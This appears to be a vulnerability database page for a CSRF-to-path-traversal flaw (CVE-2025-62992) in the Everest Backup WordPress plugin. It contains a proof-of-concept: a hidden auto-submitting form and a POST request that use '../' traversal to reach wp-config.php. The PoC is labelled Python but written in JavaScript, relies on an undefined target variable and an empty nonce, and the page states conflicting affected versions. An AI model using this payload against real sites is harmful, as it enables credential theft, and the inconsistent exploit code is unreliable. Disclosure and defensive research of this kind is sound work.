Security Vulnerability Report
中文
CVE-2025-62992 CVSS 6.5 MEDIUM

CVE-2025-62992

Published: 2025-12-31 09:15:52
Last Modified: 2026-04-23 15:34:56

Description

Cross-Site Request Forgery (CSRF) vulnerability in everestthemes Everest Backup everest-backup allows Path Traversal.This issue affects Everest Backup: from n/a through <= 2.3.11.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:everestthemes:everest_backup:*:*:*:*:*:wordpress:*:* - VULNERABLE
Everest Backup (everest-backup) <= 2.3.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62992 PoC - CSRF to Path Traversal in Everest Backup // This PoC demonstrates how an attacker can exploit the CSRF vulnerability // to perform path traversal attacks via the Everest Backup plugin const formData = new FormData(); formData.append('ebwt_action', 'restore'); formData.append('backup_file', '../../../wp-config.php'); formData.append('_wpnonce', ''); // Attacker would need to guess or use CSRF to get valid nonce const maliciousHTML = ` <!DOCTYPE html> <html> <head> <title>WordPress Admin Dashboard</title> </head> <body> <h1>Welcome to WordPress Admin</h1> <p>Loading backup settings...</p> <form id="exploitForm" action="${targetUrl}/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="action" value="ebwt_restore"> <input type="hidden" name="ebwt_action" value="restore"> <input type="hidden" name="backup_file" value="../../../wp-config.php"> <input type="hidden" name="_wpnonce" value=""> </form> <script> // Auto-submit the form when page loads document.getElementById('exploitForm').submit(); </script> </body> </html> `; // Alternative: Direct CSRF PoC for path traversal const csrfPoc = { method: 'POST', url: 'https://target-site.com/wp-admin/admin-ajax.php', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=ebwt_restore&ebwt_action=restore&backup_file=../../../../wp-config.php' }; console.log('CVE-2025-62992 PoC Generated'); console.log('Target: WordPress site with Everest Backup plugin <= 2.3.11');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62992", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:52.073", "lastModified": "2026-04-23T15:34:55.530", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in everestthemes Everest Backup everest-backup allows Path Traversal.This issue affects Everest Backup: from n/a through <= 2.3.11."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en temas de Everest Everest Backup permite salto de ruta. Este problema afecta a Everest Backup: desde n/a hasta 2.3.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:everestthemes:everest_backup:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "2.3.9", "matchCriteriaId": "AD383250-04DD-40B6-89F9-CFD15F742FD4"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/everest-backup/vulnerability/wordpress-everest-backup-plugin-2-3-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}